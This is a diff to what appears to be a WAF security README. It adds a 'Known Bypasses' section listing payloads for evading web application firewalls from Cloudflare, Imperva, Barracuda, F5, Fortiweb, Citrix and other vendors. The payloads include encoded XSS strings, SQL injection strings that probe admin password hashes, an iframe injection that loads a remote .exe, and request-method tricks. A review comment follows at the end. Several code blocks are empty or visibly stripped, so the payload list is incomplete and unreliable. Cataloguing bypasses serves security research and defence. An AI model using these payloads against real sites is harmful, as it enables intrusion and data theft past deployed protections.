diff --git a/README.md b/README.md index 5845ae9..43355c0 100644 --- a/README.md +++ b/README.md @@ -290,7 +290,7 @@ Wanna detect WAFs? Lets see how.
  • Detection Methodology:
  • @@ -1443,6 +1443,119 @@ __Drawbacks:__ ## Google Dorks Approach: +## Known Bypasses: +- __Cloudflare__ - Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` +X +``` + +- __Imperva SecureSphere__ +* Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` +%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E +``` +* SQL Injection _([Source 1](https://www.exploit-db.com/exploits/35729), [Source 2](https://www.exploit-db.com/exploits/28854))_ +``` +15 and '1'=(SELECT '1' FROM dual) and '0having'='0having' +stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1 +``` + +- __Barracuda__ +- Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` + +
    Right-Click Here + +``` +- HTML Injection _([Source](https://www.exploit-db.com/exploits/33423))_ +``` +/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US +``` +- __dotDefender__ - Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` + + + +``` +* GET - Cross Site Scripting _([Source](https://www.exploit-db.com/exploits/14355))_ +``` + +``` + +* POST Based Cross Site Scripting _([Source](https://www.exploit-db.com/exploits/14355))_ +``` + +``` + +- __Fortiweb__ - Cross Site Scripting _([Source](https://www.exploit-db.com/exploits/38100))_ +``` +/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C +/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0 +``` + +- __F5 ASM__ - Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` +
    +"/>a +``` + +- __f5 BIG-IP__ - Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` + +
    Right-Click Here + +
    Right-Click Here +``` + +- __ModSecurity__ - Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` + + +``` + +- __Citrix NetScaler NS10.5__ - HTTP Parameter Pollution _([Source](https://www.exploit-db.com/exploits/36369))_ +``` + + + + ’ union select current_user, 2# + + +``` + +- __WebKnight__ - Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` + + +
    +
    Right-Click Here +``` + +- __QuickDefense__ - Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` +? +
    +``` + +- __Apache__ - Writing method type in lowercase. _([Source](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet))_ +``` +get /login HTTP/1.1 +Host: favoritewaf.com +User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) +``` + +- __IIS__ - Tabs before method _([Source](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet))_ +``` + GET /login.php HTTP/1.1 +Host: favoritewaf.com +User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) +``` + ## Awesome Tools ### WAF Fingerprinting: __1. Fingerprinting with [NMap](https://nmap.org)__:
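Review bot: In the added Known Bypasses list, the per-vendor sub-entries are not nested consistently. Under `- __Imperva SecureSphere__` they use `*`, under `- __Barracuda__` they use `-`, and under `- __dotDefender__` the first entry is inline while the GET and POST entries use `*`. As shown here they all sit at the same indentation as the vendor bullets, so they will render as sibling items rather than as children of the vendor. Indent the sub-entries and use one marker throughout. The vendor casing also differs between `__F5 ASM__` and `__f5 BIG-IP__`. The Barracuda HTML Injection example carries what look like request-specific values copied from the advisory (`password=121c34d4e85dfe6758f31ce2d7b763e7`, `et=1261217792`); replacing them with labelled placeholders would keep the README from publishing a credential-like hash. Only the Citrix NetScaler entry states a version (NS10.5); adding the affected version or advisory date to the other entries would let readers judge whether a listed rule gap still applies to the WAF release they run.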